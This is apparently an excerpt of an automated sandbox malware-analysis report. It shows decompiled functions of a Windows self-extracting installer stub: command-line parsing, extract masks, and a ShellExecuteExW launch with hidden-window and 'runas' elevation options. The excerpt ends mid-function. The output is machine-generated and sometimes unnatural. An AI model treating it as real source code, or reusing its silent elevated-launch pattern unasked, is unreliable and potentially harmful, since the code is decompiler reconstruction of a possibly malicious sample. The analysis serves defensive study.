Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040436E

_wtol.MSVCRT(?,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 00402130

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 004022A5
??3@YAXPAX@Z.MSVCRT ref: 004022AD
??3@YAXPAX@Z.MSVCRT ref: 004022B5
??3@YAXPAX@Z.MSVCRT ref: 004022D2
??3@YAXPAX@Z.MSVCRT ref: 004022DA

Part of subcall function 00401DCA: GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401E98
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EA0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EA8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EB0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EB8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EC0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EC8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401ED0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401ED8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT ref: 00401EE0
Part of subcall function 00401DCA: GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3

SetLastError.KERNEL32(00000000,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 004022FF
GetLastError.KERNEL32(00000000,0041E89C,?,00000000), ref: 0040230E
??3@YAXPAX@Z.MSVCRT ref: 00402335
??3@YAXPAX@Z.MSVCRT ref: 0040233D
??3@YAXPAX@Z.MSVCRT ref: 0040234F

Strings

nowait, xrefs: 004020D7
del, xrefs: 00402157
shc, xrefs: 00402145
forcenowait, xrefs: 004020F4
hidcon, xrefs: 004020BE
waitall, xrefs: 004020A5
ExecuteParameters, xrefs: 004021D5

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy$??2@$CurrentDirectoryErrorLast$CommandInfoLineStartup_wtol
String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
API String ID: 3919891259-4019298132
Opcode ID: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
Instruction ID: bb106943ed3ca53a05403cb5435deaebd1a3063295b86531880bb6a0f43f7546
Opcode Fuzzy Hash: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
Instruction Fuzzy Hash: 2381C171E04115ABCB15BBA1D9595EE77B5AF40308F24403FE602772E1EABC1D82D78E

Uniqueness

Uniqueness Score: -1.00%

Function 004193AF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x41c878);
				_push(0x419540);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422b88 =  *0x422b88 | 0xffffffff;
				 *0x422b8c =  *0x422b8c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x420b6c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x420b68; // 0x0
				 *_t24 = _t47;
				 *0x422b84 = _adjust_fdiv;
				_t27 = E0041953B( *_adjust_fdiv);
				_t60 =  *0x41e6e0; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E00419538);
					_pop(_t47);
				}
				E00419526(_t27);
				_push(0x41e074);
				_push(0x41e070);
				L00419520();
				_t29 =  *0x420b64; // 0x0
				_v112 = _t29;
				_t6 =  &_v116; // 0x41e074
				__getmainargs( &_v100, _t6,  &_v104,  *0x420b60,  &_v112);
				_push(0x41e06c);
				_push(0x41e000); // executed
				L00419520(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00407118(_t47);
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041951A();
				return _t41;
			}

0x004193b2
0x004193b4
0x004193b9
0x004193c4
0x004193c5
0x004193d2
0x004193d7
0x004193dc
0x004193e3
0x004193ea
0x004193f1
0x004193f7
0x004193fd
0x004193ff
0x00419405
0x0041940b
0x00419414
0x00419419
0x0041941e
0x00419424
0x0041942b
0x00419431
0x00419431
0x00419432
0x00419437
0x0041943c
0x00419441
0x00419446
0x0041944b
0x0041945c
0x00419464
0x0041946a
0x0041946f
0x00419474
0x00419481
0x00419483
0x00419489
0x004194c5
0x004194ca
0x004194cb
0x004194cb
0x0041948b
0x0041948b
0x0041948b
0x0041948c
0x0041948f
0x00419491
0x0041949c
0x0041949e
0x0041949e
0x0041949f
0x0041949f
0x0041949c
0x004194a2
0x004194a6
0x00000000
0x00000000
0x004194ac
0x004194b3
0x004194bd
0x004194d2
0x004194bf
0x004194bf
0x004194bf
0x004194d3
0x004194d4
0x004194d5
0x004194dd
0x004194de
0x004194e3
0x004194e7
0x004194ed
0x004194f2
0x004194f4
0x004194f7
0x004194f8
0x004194f9
0x00419500

APIs

__set_app_type.MSVCRT ref: 004193DC
__p__fmode.MSVCRT ref: 004193F1
__p__commode.MSVCRT ref: 004193FF
__setusermatherr.MSVCRT ref: 0041942B
_initterm.MSVCRT ref: 00419441
__getmainargs.MSVCRT ref: 00419464
_initterm.MSVCRT ref: 00419474
GetStartupInfoA.KERNEL32(?), ref: 004194B3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004194D7
exit.KERNELBASE ref: 004194E7
_XcptFilter.MSVCRT ref: 004194F9

Strings

tA, xrefs: 0041945C, 0041945F

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: tA
API String ID: 801014965-3672045730
Opcode ID: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
Instruction ID: 2bf29183f708790e43ece5c4b13c67657fe3397540b73bc69793bae2ed7e9e0f
Opcode Fuzzy Hash: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
Instruction Fuzzy Hash: 9D41AAB5D44308AFCB21DFA5DC55AEA7FB8EB09314F20412FE841A7291D7785C82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402D99, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402D99(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				char* _v28;
				signed int _v32;
				short _v36;
				short _v40;
				intOrPtr* _v44;
				char _v56;
				char _v68;
				char _v80;
				signed int _v88;
				char _v92;
				short _v94;
				char _v96;
				char _v104;
				signed int _t93;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				char* _t132;
				intOrPtr _t147;
				void* _t175;
				signed int _t177;
				char* _t181;
				intOrPtr _t182;
				signed int _t186;
				intOrPtr _t190;
				intOrPtr _t191;

				_t175 = __edx;
				 *0x41e774 =  *0x41e774 & 0xfffffff7;
				_v44 = __ecx;
				_v40 = 0;
				_t93 = E00401341(0x41e7b8, __eflags);
				if(_t93 != 0) {
					__eflags =  *0x41e8d8 - 2;
					if( *0x41e8d8 == 2) {
						L9:
						_push(0x48);
						L004191BC();
						__eflags = _t93;
						if(_t93 == 0) {
							_v36 = 0;
						} else {
							_v36 = E00402671(_t93);
						}
						_t181 = L"ExtractMaskInclude";
						E00402D2C(_t181);
						_t132 = L"ExtractMaskExclude";
						E00402D2C(_t132);
						__eflags =  *0x41e774 & 0x00000020;
						_v28 = _t132;
						_v20 = _t181;
						if(( *0x41e774 & 0x00000020) != 0) {
							_v28 = _t181;
							_v20 = _t132;
						}
						_t96 = E00405041();
						__eflags = _t96;
						if(_t96 == 0) {
							E00411B60(E00411B60(_t96,  &_v104),  &_v92);
							E00411BE5( &_v104, _v20);
							E00411BE5( &_v92, 0x41abb8);
							E00402963( &_v104, 0x41e7a0, 0,  &_v104);
							_push(_v92);
							L004191B0();
							_push(_v104);
							L004191B0();
						}
						_t97 = E004011CA(0x41e7b8);
						_t177 = 4;
						_v32 = _t97;
						_t178 = _t97 * _t177 >> 0x20;
						_t98 = _t97 * _t177;
						_push( ~(0 | __eflags > 0x00000000) | _t98);
						L004191BC();
						_t182 = 0;
						_t186 = 0;
						_v24 = _t98;
						__eflags = _v32;
						if(_v32 <= 0) {
							L39:
							_t147 = _v36;
							 *((intOrPtr*)(_t147 + 0x30)) = _v24;
							 *(_t147 + 0x34) = _t186;
							__eflags = _t186;
							if(_t186 != 0) {
								_t102 = E0040284E(_t147, _t178,  *_v44); // executed
								_v40 = _t102;
							}
							_push(_v24);
							L004191B0();
							_t100 = _v40;
							L42:
							L43:
							return _t100;
						} else {
							do {
								_v88 = _v88 & 0;
								_t178 =  &_v96;
								_v96 = 0;
								_v94 = 0;
								_t104 =  *0x41e7c0; // 0xbc2608
								_t105 =  *((intOrPtr*)( *_t104 + 0x18))(_t104, _t182, 3,  &_v96);
								__eflags = _t105;
								if(_t105 != 0) {
									goto L38;
								}
								__eflags = _v96 - 8;
								if(_v96 != 8) {
									goto L38;
								}
								E00411B84( &_v56, _v88);
								_v16 = _v16 & 0x00000000;
								_t40 =  &_v12;
								 *_t40 = _v12 & 0x00000000;
								__eflags =  *_t40;
								do {
									_t178 =  &_v12;
									_t108 = E00405041();
									__eflags = _t108;
									if(_t108 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00411B84( &_v68, _t108);
									_t178 =  &_v56;
									_t118 = E0041200B( &_v68,  &_v56);
									_push(_v68);
									__eflags = _t118;
									_v5 = _t118 != 0;
									L004191B0();
									__eflags = _v5;
									if(_v5 != 0) {
										_t178 = _v28;
										_t119 = E00402577(_t182, _v28);
										__eflags = _t119;
										if(_t119 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
								} while (_v16 == 0);
								_v12 = _v12 & 0x00000000;
								__eflags = _v16;
								if(_v16 != 0) {
									L37:
									_push(_v56);
									L004191B0();
									goto L38;
								} else {
									goto L27;
								}
								do {
									L27:
									_t178 =  &_v12;
									_t109 = E00405041();
									__eflags = _t109;
									if(_t109 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00411B84( &_v80, _t109);
									_t178 =  &_v56;
									_t114 = E0041200B( &_v80,  &_v56);
									_push(_v80);
									__eflags = _t114;
									L004191B0();
									__eflags = _t132 & 0xffffff00 | _t114 != 0x00000000;
									if((_t132 & 0xffffff00 | _t114 != 0x00000000) != 0) {
										_t178 = _v20;
										_t115 = E00402577(_t182, _v20);
										__eflags = _t115;
										if(_t115 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
									_t132 = L"ExtractMaskExclude";
								} while (_v16 == 0);
								__eflags = _v16;
								if(_v16 == 0) {
									_t178 = _t132;
									_t110 = E004115B0(_t132);
									__eflags = _t110;
									if(_t110 == 0) {
										_t178 = L"ExtractMaskInclude";
										_t111 = E00402577(_t182, L"ExtractMaskInclude");
										__eflags = _t111;
										if(_t111 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
									}
								}
								goto L37;
								L38:
								E004114AA( &_v96);
								_t182 = _t182 + 1;
								__eflags = _t182 - _v32;
							} while (_t182 < _v32);
							goto L39;
						}
					}
					_t93 = E00404772( *__ecx, _t175); // executed
					__eflags = _t93;
					if(_t93 != 0) {
						goto L9;
					} else {
						_t100 = 0x80004005;
						goto L43;
					}
				}
				_t190 =  *0x41e700; // 0x0
				if(_t190 != 0) {
					L4:
					_push(0x13);
					L5:
					_pop(_t128);
					_push(0);
					E0040976C(_t175);
					_t100 = 0x80004005;
					goto L42;
				}
				_t191 =  *0x41e704; // 0x0
				if(_t191 != 0) {
					goto L4;
				} else {
					_push(8);
					goto L5;
				}
			}

0x00402d99
0x00402d9f
0x00402db4
0x00402db7
0x00402dba
0x00402dc1
0x00402dec
0x00402df3
0x00402e0a
0x00402e0a
0x00402e0c
0x00402e12
0x00402e14
0x00402e22
0x00402e16
0x00402e1d
0x00402e1d
0x00402e25
0x00402e2c
0x00402e31
0x00402e38
0x00402e3d
0x00402e44
0x00402e47
0x00402e4a
0x00402e4c
0x00402e4f
0x00402e4f
0x00402e57
0x00402e5c
0x00402e5e
0x00402e6b
0x00402e76
0x00402e83
0x00402e91
0x00402e96
0x00402e99
0x00402e9e
0x00402ea1
0x00402ea7
0x00402eaa
0x00402eb3
0x00402eb4
0x00402eb7
0x00402eb7
0x00402ec0
0x00402ec1
0x00402ec6
0x00402ec8
0x00402ecb
0x00402ece
0x00402ed1
0x0040302c
0x0040302c
0x00403032
0x00403035
0x00403038
0x0040303a
0x00403041
0x00403046
0x00403046
0x00403049
0x0040304c
0x00403051
0x00403054
0x00403055
0x00403059
0x00402ed7
0x00402ed7
0x00402ed9
0x00402edc
0x00402ee2
0x00402ee6
0x00402eea
0x00402ef3
0x00402ef6
0x00402ef8
0x00000000
0x00000000
0x00402efe
0x00402f03
0x00000000
0x00000000
0x00402f0f
0x00402f14
0x00402f18
0x00402f18
0x00402f18
0x00402f1c
0x00402f1f
0x00402f22
0x00402f27
0x00402f29
0x00000000
0x00000000
0x00402f2b
0x00402f32
0x00402f37
0x00402f3d
0x00402f42
0x00402f45
0x00402f47
0x00402f4b
0x00402f50
0x00402f55
0x00402f57
0x00402f5c
0x00402f61
0x00402f63
0x00402f68
0x00402f6b
0x00402f6b
0x00402f6b
0x00402f6c
0x00402f6c
0x00402f73
0x00402f73
0x00402f79
0x00402f7d
0x00402f81
0x00403011
0x00403011
0x00403014
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f87
0x00402f87
0x00402f8a
0x00402f8d
0x00402f92
0x00402f94
0x00000000
0x00000000
0x00402f96
0x00402f9d
0x00402fa2
0x00402fa8
0x00402fad
0x00402fb0
0x00402fb5
0x00402fbb
0x00402fbd
0x00402fbf
0x00402fc4
0x00402fc9
0x00402fcb
0x00402fd0
0x00402fd3
0x00402fd3
0x00402fd3
0x00402fd4
0x00402fd4
0x00402fdb
0x00402fdf
0x00402fdf
0x00402fe6
0x00402fea
0x00402fef
0x00402ff1
0x00402ff6
0x00402ff8
0x00402ffa
0x00403001
0x00403006
0x00403008
0x0040300d
0x00403010
0x00403010
0x00403010
0x00403008
0x00402ff8
0x00000000
0x0040301a
0x0040301d
0x00403022
0x00403023
0x00403023
0x00000000
0x00402ed7
0x00402ed1
0x00402df7
0x00402dfc
0x00402dfe
0x00000000
0x00402e00
0x00402e00
0x00000000
0x00402e00
0x00402dfe
0x00402dc3
0x00402dc9
0x00402dd7
0x00402dd7
0x00402dd9
0x00402dd9
0x00402ddb
0x00402ddc
0x00402de2
0x00000000
0x00402de2
0x00402dcb
0x00402dd1
0x00000000
0x00402dd3
0x00402dd3
0x00000000
0x00402dd3

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402E0C
??3@YAXPAX@Z.MSVCRT ref: 00402E99
??3@YAXPAX@Z.MSVCRT ref: 00402EA1
??2@YAPAXI@Z.MSVCRT ref: 00402EC1
??3@YAXPAX@Z.MSVCRT ref: 00402F4B
??3@YAXPAX@Z.MSVCRT ref: 00402FB5
??3@YAXPAX@Z.MSVCRT ref: 00403014
??3@YAXPAX@Z.MSVCRT ref: 0040304C

Strings

ExtractMaskExclude, xrefs: 00402E31, 00402FDF
ExtractMaskInclude, xrefs: 00402E25, 00402FFA
PreExtract, xrefs: 00402DA8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@
String ID: ExtractMaskExclude$ExtractMaskInclude$PreExtract
API String ID: 4113381792-1386291556
Opcode ID: 406238238b535d24374771f7236d98b6007aa0e5fb5cd7d765205bea0dfad848
Instruction ID: 7269ace4ee49ce545d33163e420a246a4dc032d25f4e3fe66d88e93700a2274f
Opcode Fuzzy Hash: 406238238b535d24374771f7236d98b6007aa0e5fb5cd7d765205bea0dfad848
Instruction Fuzzy Hash: E1816B70E002099BDF14EFA2C955AEEBBB5AF44314F10406FE902BB2D1EB785D85CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040391C, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040391C(void* __edx) {
				struct tagRECT _v20;
				struct tagMSG _v48;
				struct HWND__* _t9;
				int _t21;
				int _t27;
				void* _t28;
				struct HWND__* _t29;

				_t28 = __edx;
				_t9 = CreateWindowExW(0x80, L"tooltips_class32", L"sfx", 0, 0, 0, 0, 0, 0, 0, GetModuleHandleW(0), 0); // executed
				_t29 = _t9;
				GetWindowRect(GetDesktopWindow(),  &_v20);
				asm("cdq");
				asm("cdq");
				_t21 = SetWindowPos(_t29, 0, _v20.right - _v20.left - _t28 >> 1, _v20.bottom - _v20.top - _t28 >> 1, 0, 0, 4);
				if(_t29 != 0) {
					SetTimer(_t29, 1, 1, 0); // executed
					GetMessageW( &_v48, 0, 0, 0);
					DispatchMessageW( &_v48);
					_t27 = KillTimer(_t29, 1);
					 *0x41e72c = _t29;
					return _t27;
				}
				return _t21;
			}

0x0040391c
0x00403945
0x0040394b
0x00403958
0x00403966
0x00403974
0x0040397c
0x00403984
0x0040398c
0x00403999
0x004039a3
0x004039ac
0x004039b2
0x00000000
0x004039b2
0x004039bb

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
CreateWindowExW.USER32 ref: 00403945
GetDesktopWindow.USER32 ref: 00403951
GetWindowRect.USER32 ref: 00403958
SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
DispatchMessageW.USER32 ref: 004039A3
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC

Strings

sfx, xrefs: 00403936
tooltips_class32, xrefs: 0040393B

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
String ID: sfx$tooltips_class32
API String ID: 3184818434-2224206080
Opcode ID: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
Instruction ID: bab660aaf1360166561ca95da768f7ace0d5693b3f23dfe4253bd0ab20d9046d
Opcode Fuzzy Hash: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
Instruction Fuzzy Hash: E411AC72902224BFCB109BB99C4CEEF3F7DEB49721F008020F605E2290CA749040CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC0, Relevance: 15.1, APIs: 10, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00401CC0(intOrPtr __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				char _v32;
				struct _SHELLEXECUTEINFOW _v92;
				void* _t36;
				struct HWND__* _t42;
				int _t50;
				int _t51;
				signed int _t55;
				signed int _t56;
				int _t66;

				_v8 = __ecx;
				_t55 = __edx;
				E00411B60(E00411B60(_t36,  &_v20),  &_v32);
				_t66 = 0;
				memset( &_v92, 0, 0x3c);
				_v92.cbSize = 0x3c;
				_v92.lpDirectory = _a4;
				_v92.fMask = 0x740;
				_v92.nShow = 0xa;
				if((_t55 & 0x00000001) != 0) {
					_v92.nShow = 0;
					_v92.fMask = 0x8740;
				}
				if((_t55 & 0x00000002) != 0) {
					_v92.lpVerb = L"runas";
				}
				_t56 = _t55 & 0x00010000;
				if(_t56 == 0) {
					_v92.fMask = _v92.fMask | 0x00000100;
				}
				_t42 =  *0x41e72c; // 0x13007e
				_v92.hwnd = _t42;
				ShowWindow(_t42, 5); // executed
				BringWindowToTop(_v92.hwnd);
				E00411BE5( &_v32, E0040310A(_v8,  &_v20));
				if(_v16 != _t66) {
					_v92.lpFile = _v20;
					_v92.lpParameters = _v32;
					_t50 = ShellExecuteExW( &_v92); // executed
					if(_t50 != 0) {
						if(_t56 == _t66) {
							WaitForSingleObject(_v92.hProcess, 0xffffffff);
						}
						CloseHandle(_v92.hProcess);
						_t66 = 1;
					}
					_push(_v32);
					L004191B0();
					_push(_v20);
					L004191B0();
					_t51 = _t66;
				} else {
					_push(_v32);
					L004191B0();
					_push(_v20);
					L004191B0();
					_t51 = 1;
				}
				return _t51;
			}

0x00401cc7
0x00401cce
0x00401cd8
0x00401cdf
0x00401ce6
0x00401cf1
0x00401cf8
0x00401cfb
0x00401d02
0x00401d0c
0x00401d0e
0x00401d11
0x00401d11
0x00401d1b
0x00401d1d
0x00401d1d
0x00401d24
0x00401d2a
0x00401d2c
0x00401d2c
0x00401d33
0x00401d3b
0x00401d3e
0x00401d47
0x00401d5c
0x00401d64
0x00401d7e
0x00401d84
0x00401d8b
0x00401d93
0x00401d97
0x00401d9e
0x00401d9e
0x00401da7
0x00401daf
0x00401daf
0x00401db0
0x00401db3
0x00401db8
0x00401dbb
0x00401dc0
0x00401d66
0x00401d66
0x00401d69
0x00401d6e
0x00401d71
0x00401d78
0x00401d78
0x00401dc7

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

memset.MSVCRT ref: 00401CE6
ShowWindow.USER32(0013007E,00000005,?,0041A9F0,00000000), ref: 00401D3E
BringWindowToTop.USER32(?), ref: 00401D47
??3@YAXPAX@Z.MSVCRT ref: 00401D69
??3@YAXPAX@Z.MSVCRT ref: 00401D71
ShellExecuteExW.SHELL32(0000003C), ref: 00401D8B
WaitForSingleObject.KERNEL32(?,000000FF,?,0041A9F0,00000000), ref: 00401D9E
CloseHandle.KERNEL32(?,?,0041A9F0,00000000), ref: 00401DA7
??3@YAXPAX@Z.MSVCRT ref: 00401DB3
??3@YAXPAX@Z.MSVCRT ref: 00401DBB

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$Window$??2@BringCloseExecuteHandleObjectShellShowSingleWaitmemset
String ID:
API String ID: 1117119541-0
Opcode ID: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
Instruction ID: 93afddeaf3da2945c8596fa82df557d0c9d3bebd8f4b061b1b635e28d7e4d180
Opcode Fuzzy Hash: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
Instruction Fuzzy Hash: 35316971E00209ABDF11DFE5DC49ADEBBB5FF44304F10802AE512B62A4EB7C6994CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00414E08, Relevance: 11.0, APIs: 7, Instructions: 497
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00414E08() {
				void* __esi;
				signed int _t244;
				signed int _t248;
				signed int _t253;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				intOrPtr _t296;
				signed int _t298;
				signed int _t299;
				signed int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t331;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t376;
				intOrPtr _t398;
				signed int _t404;
				signed int _t416;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t436;
				void* _t437;
				signed int _t439;
				signed int _t443;
				intOrPtr* _t445;
				void* _t447;

				L00419240();
				 *((intOrPtr*)(_t445 - 0x10)) = _t447 - 0xfffffffffffffff0;
				 *(_t445 - 4) = 0;
				_t428 =  *(_t445 + 0x7c);
				_t341 = _t428;
